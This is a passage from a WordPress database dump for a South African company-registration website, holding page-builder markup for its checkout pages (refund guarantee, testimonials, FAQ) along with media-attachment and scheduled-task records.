Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||||false|false\"]<h3>100% Money Back. No-Risk. Full Refund Policy.</h3>\n<p>No Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.</p>[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"14px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"13px\" body_line_height=\"1em\" custom_margin=\"-16px||||false|false\" custom_padding=\"0px||||false|false\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"14px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"13px\" body_line_height=\"1em\" custom_margin=\"-16px||||false|false\" custom_padding=\"0px||||false|false\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.26.3\" height=\"46px\" custom_margin=\"||0px||false|false\"][/et_pb_divider][et_pb_blurb image=\"https://companyregistration.online/wp-content/uploads/2019/07/privacy-1.png\" image_max_width=\"46%\" content_max_width=\"107px\" admin_label=\"Image and Text: We Protect Your Privacy\" module_class=\"inline-col3\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" body_font=\"Poppins||||||||\" body_line_height=\"1.2em\" transform_translate=\"-120px|1px\" text_orientation=\"center\" min_height=\"100px\" height=\"100px\" max_height=\"102px\" custom_margin=\"0px||-90px||false|false\"]We Protect Your Privacy[/et_pb_blurb][et_pb_blurb image=\"https://companyregistration.online/wp-content/uploads/2019/07/guarantee-1.png\" image_max_width=\"47%\" content_max_width=\"110px\" admin_label=\"Text and Image: 100% Satisfaction\" module_class=\"inline-col3\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" body_font=\"Poppins||||||||\" body_line_height=\"1.2em\" text_orientation=\"center\" custom_margin=\"||-138px||false|false\"]<p>100% Satisfaction</p>\r[/et_pb_blurb][et_pb_blurb image=\"https://companyregistration.online/wp-content/uploads/2019/07/secure-1.png\" image_max_width=\"47%\" content_max_width=\"110px\" admin_label=\"Text and Image: Your Data is Safe With Us\" module_class=\"inline-col3\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" body_font=\"Poppins||||||||\" body_line_height=\"1.2em\" transform_translate=\"125px|-20px\" text_orientation=\"center\" custom_margin=\"||10px||false|false\"]Your Data is Safe With Us[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" module_class=\"divider-bottom\" _builder_version=\"3.26.3\" height=\"46px\" custom_margin=\"-15px||0px||false|false\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>\n[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Once the order is made an email will be sent containing all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section]','Cartflow Checkout','','publish','closed','closed','','cartflow-checkout','','','2019-07-20 14:02:14','2019-07-20 12:02:14','',0,'https://companyregistration.online/et_pb_layout/cartflow-checkout/',0,'et_pb_layout','',0),(31316,1,'2019-07-18 15:44:28','2019-07-18 13:44:28','','client4-free-img.png','','inherit','open','closed','','client4-free-img-png','','','2019-07-18 15:44:28','2019-07-18 13:44:28','',0,'https://companyregistration.online/wp-content/uploads/2019/07/client4-free-img.png',0,'attachment','image/png',0),(31317,1,'2019-07-18 15:44:28','2019-07-18 13:44:28','','client3-free-img-4.png','','inherit','open','closed','','client3-free-img-4-png','','','2019-07-18 15:44:28','2019-07-18 13:44:28','',0,'https://companyregistration.online/wp-content/uploads/2019/07/client3-free-img-4.png',0,'attachment','image/png',0),(31313,1,'2019-07-18 15:44:27','2019-07-18 13:44:27','','stars2-free-img.png','','inherit','open','closed','','stars2-free-img-png','','','2019-07-18 15:44:27','2019-07-18 13:44:27','',0,'https://companyregistration.online/wp-content/uploads/2019/07/stars2-free-img.png',0,'attachment','image/png',0),(31309,1,'2019-07-18 15:44:25','2019-07-18 13:44:25','','working-free-img.jpg','','inherit','open','closed','','working-free-img-jpg','','','2019-07-18 15:44:25','2019-07-18 13:44:25','',0,'https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg',0,'attachment','image/jpeg',0),(31310,1,'2019-07-18 15:44:26','2019-07-18 13:44:26','','mobile-shop-free-img.jpg','','inherit','open','closed','','mobile-shop-free-img-jpg','','','2019-07-18 15:44:26','2019-07-18 13:44:26','',0,'https://companyregistration.online/wp-content/uploads/2019/07/mobile-shop-free-img.jpg',0,'attachment','image/jpeg',0),(31311,1,'2019-07-18 15:44:27','2019-07-18 13:44:27','','working-clock-free-img.jpg','','inherit','open','closed','','working-clock-free-img-jpg','','','2019-07-18 15:44:27','2019-07-18 13:44:27','',0,'https://companyregistration.online/wp-content/uploads/2019/07/working-clock-free-img.jpg',0,'attachment','image/jpeg',0),(31312,1,'2019-07-18 15:44:27','2019-07-18 13:44:27','','quote-grey-free-img-1.png','','inherit','open','closed','','quote-grey-free-img-1-png','','','2019-07-18 15:44:27','2019-07-18 13:44:27','',0,'https://companyregistration.online/wp-content/uploads/2019/07/quote-grey-free-img-1.png',0,'attachment','image/png',0),(31314,1,'2019-07-18 15:44:28','2019-07-18 13:44:28','','client1-free-img-1.png','','inherit','open','closed','','client1-free-img-1-png','','','2019-07-18 15:44:28','2019-07-18 13:44:28','',0,'https://companyregistration.online/wp-content/uploads/2019/07/client1-free-img-1.png',0,'attachment','image/png',0),(31307,1,'2019-07-18 15:44:25','2019-07-18 13:44:25','','clip-free-img.png','','inherit','open','closed','','clip-free-img-png','','','2019-07-18 15:44:25','2019-07-18 13:44:25','',0,'https://companyregistration.online/wp-content/uploads/2019/07/clip-free-img.png',0,'attachment','image/png',0),(31308,1,'2019-07-18 15:44:25','2019-07-18 13:44:25','','testtube-free-img.png','','inherit','open','closed','','testtube-free-img-png','','','2019-07-18 15:44:25','2019-07-18 13:44:25','',0,'https://companyregistration.online/wp-content/uploads/2019/07/testtube-free-img.png',0,'attachment','image/png',0),(31306,1,'2019-07-18 15:44:25','2019-07-18 13:44:25','','dna-free-img.png','','inherit','open','closed','','dna-free-img-png','','','2019-07-18 15:44:25','2019-07-18 13:44:25','',0,'https://companyregistration.online/wp-content/uploads/2019/07/dna-free-img.png',0,'attachment','image/png',0),(31302,1,'2019-07-18 15:44:24','2019-07-18 13:44:24','','logo-regular-free-img.png','','inherit','open','closed','','logo-regular-free-img-png','','','2019-07-18 15:44:24','2019-07-18 13:44:24','',0,'https://companyregistration.online/wp-content/uploads/2019/07/logo-regular-free-img.png',0,'attachment','image/png',0),(31303,1,'2019-07-18 15:44:24','2019-07-18 13:44:24','','atom01-free-img.png','','inherit','open','closed','','atom01-free-img-png','','','2019-07-18 15:44:24','2019-07-18 13:44:24','',0,'https://companyregistration.online/wp-content/uploads/2019/07/atom01-free-img.png',0,'attachment','image/png',0),(31304,1,'2019-07-18 15:44:24','2019-07-18 13:44:24','','system-free-img.png','','inherit','open','closed','','system-free-img-png','','','2019-07-18 15:44:24','2019-07-18 13:44:24','',0,'https://companyregistration.online/wp-content/uploads/2019/07/system-free-img.png',0,'attachment','image/png',0),(31305,1,'2019-07-18 15:44:25','2019-07-18 13:44:25','','magnify-free-img.png','','inherit','open','closed','','magnify-free-img-png','','','2019-07-18 15:44:25','2019-07-18 13:44:25','',0,'https://companyregistration.online/wp-content/uploads/2019/07/magnify-free-img.png',0,'attachment','image/png',0),(31334,3,'2019-07-18 16:51:35','2019-07-18 14:51:35','','company-register','','inherit','open','closed','','company-register-3','','','2019-07-18 16:51:35','2019-07-18 14:51:35','',31327,'https://companyregistration.online/wp-content/uploads/2019/07/company-register-1.gif',0,'attachment','image/gif',0),(31362,1,'2019-07-18 22:21:27','2019-07-18 20:21:27','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\" custom_padding=\"0|0px|0|0px|false|false\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.27.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-6px||||false|false\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.0.0\"]<h3>Get Your Company Registered By a Professional Consultant<span style=\"color: #ffffff;\"></span></h3>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.27.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins|300|||||||\" header_3_font_size=\"25px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-6px||||false|false\" hover_enabled=\"0\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.0.0\" header_3_text_align=\"center\"]<h3>Companies are typically registered within 3 days<span style=\"color: #ffffff;\"></span></h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"0.0.1\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.1.0\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"1\" _address=\"0.0.1.1\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"2\" _address=\"0.0.1.2\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"3\" _address=\"0.0.1.3\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\" custom_margin=\"-174px||||false|false\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\" _i=\"0\" _address=\"1.0.0.0\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_number_counter title=\"Companies registered by our consultants exceed\" number=\"3520\" percent_sign=\"off\" _builder_version=\"3.27.3\" title_font=\"Poppins||||||||\" number_text_shadow_style=\"preset1\" custom_padding=\"||10px||false|false\" hover_enabled=\"0\" _i=\"0\" _address=\"1.0.1.0\" number_font=\"Poppins||||||||\"][/et_pb_number_counter][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.27.3\" transform_translate=\"129px|0px\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\" animation_style=\"slide\" animation_direction=\"right\" _i=\"1\" _address=\"1.0.1.1\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"2\" _address=\"1.0.1.2\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" _i=\"3\" _address=\"1.0.1.3\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"4\" _address=\"1.0.1.4\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"5\" _address=\"1.0.1.5\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"6\" _address=\"1.0.1.6\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"7\" _address=\"1.0.1.7\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"8\" _address=\"1.0.1.8\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"9\" _address=\"1.0.1.9\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"10\" _address=\"1.0.1.10\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\" _i=\"11\" _address=\"1.0.1.11\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"12\" _address=\"1.0.1.12\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\" _i=\"13\" _address=\"1.0.1.13\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"1.0.1.13.0\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"1.0.1.13.1\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"2\" _address=\"1.0.1.13.2\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.3\" custom_margin=\"-43px||||false|false\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.27.3\" _i=\"0\" _address=\"2.0.1.0\"]<p style=\"text-align: right;\">@2018</p>\r\n<p style=\"text-align: right;\">Powered By: Digital Niche Marketing (Pty) Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','publish','closed','closed','','sa-company-registration','','','2019-08-26 16:55:43','2019-08-26 14:55:43','',0,'https://companyregistration.online/checkout-2/',0,'cartflows_step','',0),(31298,1,'2019-07-18 15:20:47','2019-07-18 13:20:47','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2019-07-18 15:20:47','2019-07-18 13:20:47','',0,'https://companyregistration.online/wp-content/uploads/2019/07/woocommerce-placeholder.png',0,'attachment','image/png',0),(31300,1,'2019-07-18 15:44:13','2019-07-18 13:44:13','','Company Registration R1250 Full Price','','publish','closed','closed','','31300','','','2019-08-24 14:43:25','2019-08-24 12:43:25','',0,'https://companyregistration.online/?cartflows_flow=31300',0,'cartflows_flow','',0),(32956,0,'2019-08-18 19:59:32','2019-08-18 19:59:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59c382391c68.32644374-KUxVTKxOykGBAU0iwIFdMyrCUhOFqGyJ','','','2019-08-18 23:30:42','2019-08-18 21:30:42','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32956',1,'scheduled-action','',3),(31296,1,'2019-07-18 15:16:41','2019-07-18 13:16:41','','Favicon','','inherit','open','closed','','favicon','','','2019-07-18 15:16:41','2019-07-18 13:16:41','',0,'https://companyregistration.online/wp-content/uploads/2019/07/Favicon.png',0,'attachment','image/png',0),(31331,3,'2019-07-18 16:03:41','2019-07-18 14:03:41','','Company Register','','publish','closed','closed','','company-register','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31331',19,'nav_menu_item','',0),(32958,0,'2019-08-18 22:30:42','2019-08-18 22:30:42','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59efeaefc9c8.29311542-TcnP7jouQQiFOSeKWVfvu0LhcitLPGuU','','','2019-08-19 02:40:10','2019-08-19 00:40:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32958',1,'scheduled-action','',3),(32960,0,'2019-08-19 01:40:11','2019-08-19 01:40:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59ffb44e0a18.41514550-SNXHJSTtS8kAoUMuiJjNNfndMc18FS3E','','','2019-08-19 03:47:32','2019-08-19 01:47:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32960',0,'scheduled-action','',3),(32962,0,'2019-08-19 02:47:32','2019-08-19 02:47:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a10098fc6a9.83535693-6zMHSCbrGgniSkWFSR8gf0TCYN6HRQ1P','','','2019-08-19 04:57:13','2019-08-19 02:57:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32962',0,'scheduled-action','',3),(32964,0,'2019-08-19 03:57:13','2019-08-19 03:57:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a2009d772f7.12930458-EyWi3Y1bNpRRvBK7cav1JzvLsq69wNxk','','','2019-08-19 06:05:29','2019-08-19 04:05:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32964',0,'scheduled-action','',3),(31377,1,'2019-07-18 23:06:26','2019-07-18 21:06:26','','Guarantee','','inherit','open','closed','','guarantee','','','2019-07-18 23:07:00','2019-07-18 21:07:00','',0,'https://companyregistration.online/wp-content/uploads/2019/07/Guarantee.png',0,'attachment','image/png',0),(31374,1,'2019-07-18 22:50:45','2019-07-18 20:50:45','','CoReg Insane Offer Conversion Ad','','inherit','open','closed','','coreg-insane-offer-conversion-ad','','','2019-07-18 22:51:22','2019-07-18 